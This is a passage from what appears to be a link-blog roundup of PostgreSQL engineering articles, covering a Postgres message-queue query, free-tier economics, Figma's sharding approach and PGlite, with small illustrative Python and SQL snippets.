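        f"SELECT id, name FROM tags WHERE name IN ({placeholders}) ORDER BY name",
        list(names),
    ).fetchall()


# Assumed schema: a unique, non-null tag name.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tags (id INTEGER PRIMARY KEY, name TEXT NOT NULL UNIQUE)")
conn.execute("INSERT INTO tags (name) VALUES ('A'), ('B')")
```

Because the conflict target is limited to name, other constraint violations such as inserting NULL still raise an error instead of being silently ignored.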

Build your own SQS or Kafka with Postgres (via) Anthony Accomazzo works on Sequin, an open source "message stream" (similar to Kafka) written in Elixir and Go on top of PostgreSQL.

This detailed article describes how you can implement message queue patterns on PostgreSQL from scratch, including this neat example using a CTE, returning and for update skip locked to retrieve $1 messages from the messages table and simultaneously mark them with not_visible_until set to $2 in order to "lock" them for processing by a client:

with available_messages as (

select seq

from messages

where not_visible_until is null

or (not_visible_until <= now())

order by inserted_at

limit $1

for update skip locked

)

update messages m

set

not_visible_until = $2,

deliver_count = deliver_count + 1,

last_delivered_at = now(),

updated_at = now()

from available_messages am

where m.seq = am.seq

returning m.seq, m.data;
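The visibility logic in that query can be modelled in plain Python. This sketch only mirrors the selection and update rules for a single process; it does not reproduce the concurrency guarantees of for update skip locked, and claim_messages with its dictionary-based messages is a hypothetical stand-in for the table.

```python
def claim_messages(messages, limit, now, not_visible_until):
    """Claim up to `limit` visible messages and hide them until `not_visible_until`."""
    available = [
        m for m in messages
        if m["not_visible_until"] is None or m["not_visible_until"] <= now
    ]
    available.sort(key=lambda m: m["inserted_at"])  # oldest first
    claimed = available[:limit]
    for m in claimed:
        m["not_visible_until"] = not_visible_until
        m["deliver_count"] += 1
        m["last_delivered_at"] = now
    return [(m["seq"], m["data"]) for m in claimed]
```

A message that is never acknowledged becomes visible again once not_visible_until has passed, so a crashed consumer does not lose it.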

The economics of a Postgres free tier (via) Xata offer a hosted PostgreSQL service with a generous free tier (15GB of volume). I'm very suspicious of free tiers that don't include a detailed breakdown of the unit economics... and in this post they've described exactly that, in great detail.

The trick is that they run their free tier on shared clusters - with each $630/month cluster supporting 2,000 free instances for $0.315 per instance per month. Then inactive databases get downgraded to even cheaper auto-scaling clusters that can host 20,000 databases for $180/month (less than 1c each).

They also cover the volume cost of $0.10/GB/month - so up to $1.50/month per free instance, but most instances only use a small portion of that space.
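The arithmetic behind those figures is simple enough to check directly. This Python sketch uses only the numbers quoted above; cost_per_instance is a hypothetical helper.

```python
from decimal import Decimal


def cost_per_instance(cluster_cost, instances):
    """Monthly cost of one instance on a shared cluster."""
    return Decimal(cluster_cost) / Decimal(instances)


shared = cost_per_instance("630", 2000)      # Decimal("0.315") per active instance
inactive = cost_per_instance("180", 20000)   # Decimal("0.009"), under one cent
max_volume = Decimal("0.10") * 15            # Decimal("1.50") if all 15GB are used
```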

It's reassuring to see this spelled out in so much detail.

Serving a billion web requests with boring code (via) Bill Mill provides a deep retrospective from his work helping build a relaunch of the medicare.gov/plan-compare site.

It's a fascinating case study of the choose boring technology mantra put into action. The "boring" choices here were PostgreSQL, Go and React, all three of which are so widely used and understood at this point that you're very unlikely to stumble into surprises with them.

Key goals for the site were accessibility, in terms of users, devices and performance. Despite best efforts:

The result fell prey after a few years to a common failure mode of react apps, and became quite heavy and loaded somewhat slowly.

I've seen this pattern myself many times over, and I'd love to understand why. React itself isn't a particularly large dependency but somehow it always seems to lead to architectural bloat over time. Maybe that's more of an SPA thing than something that's specific to React.

Loads of other interesting details in here. The ETL details - where brand new read-only RDS databases were spun up every morning after a four hour build process - are particularly notable.

Val Vibes: Semantic search in Val Town. A neat case-study by JP Posma on how Val Town's developers can use Val Town Vals to build prototypes of new features that later make it into Val Town core.

This one explores building out semantic search against Vals using OpenAI embeddings and the PostgreSQL pgvector extension.

How we built JSR (via) Really interesting deep dive by Luca Casonato into the engineering behind the new JSR alternative JavaScript package registry launched recently by Deno.

The backend uses PostgreSQL and a Rust API server hosted on Google Cloud Run.

The frontend uses Fresh, Deno’s own server-side JavaScript framework which leans heavily on the concept of “islands” - a progressive enhancement technique where pages are rendered on the server and small islands of interactivity are added once the page has loaded.

How Figma’s databases team lived to tell the scale (via) The best kind of scaling war story:

"Figma’s database stack has grown almost 100x since 2020. [...] In 2020, we were running a single Postgres database hosted on AWS’s largest physical instance, and by the end of 2022, we had built out a distributed architecture with caching, read replicas, and a dozen vertically partitioned databases."

I like the concept of "colos", their internal name for sharded groups of related tables arranged such that those tables can be queried using joins.

Also smart: separating the migration into "logical sharding" - where queries all still run against a single database, even though they are logically routed as if the database was already sharded - followed by "physical sharding" where the data is actually copied to and served from the new database servers.

Logical sharding was implemented using PostgreSQL views, which can accept both reads and writes:

CREATE VIEW table_shard1 AS SELECT * FROM table

WHERE hash(shard_key) >= min_shard_range AND hash(shard_key) < max_shard_range

The final piece of the puzzle was DBProxy, a custom PostgreSQL query proxy written in Go that can parse the query to an AST and use that to decide which shard the query should be sent to. Impressively it also has a scatter-gather mechanism, so select * from table can be sent to all shards at once and the results combined back together again.
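Hash-range routing and scatter-gather can be sketched in a few lines of Python. This is a toy model, not Figma's DBProxy: the two-shard layout, the SHA-256 based hash and all of the names are assumptions for illustration.

```python
import hashlib

HASH_SPACE = 2**32

# Hypothetical layout: two logical shards splitting the hash space in half.
SHARD_RANGES = {
    "table_shard1": (0, HASH_SPACE // 2),
    "table_shard2": (HASH_SPACE // 2, HASH_SPACE),
}


def shard_hash(shard_key):
    """Map a shard key to a stable integer in [0, HASH_SPACE)."""
    digest = hashlib.sha256(str(shard_key).encode("utf-8")).digest()
    return int.from_bytes(digest[:4], "big")


def route(shard_key):
    """Pick the shard whose half-open hash range contains the key's hash."""
    hashed = shard_hash(shard_key)
    for name, (low, high) in SHARD_RANGES.items():
        if low <= hashed < high:
            return name
    raise LookupError(f"no shard covers hash {hashed}")


def scatter_gather(run_on_shard):
    """Run a query function against every shard and combine the rows."""
    rows = []
    for name in SHARD_RANGES:
        rows.extend(run_on_shard(name))
    return rows
```

Queries that include the shard key go through route, while a query with no shard key, such as select * from table, has to go through scatter_gather.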

PGlite (via) PostgreSQL compiled for WebAssembly and turned into a very neat JavaScript library. Previous attempts at running PostgreSQL in WASM have worked by bundling a full Linux virtual machine - PGlite just bundles a compiled PostgreSQL itself, which brings the size down to an impressive 3.7MB gzipped.

I built this interactive demo of PGlite using Observable Framework, source code here.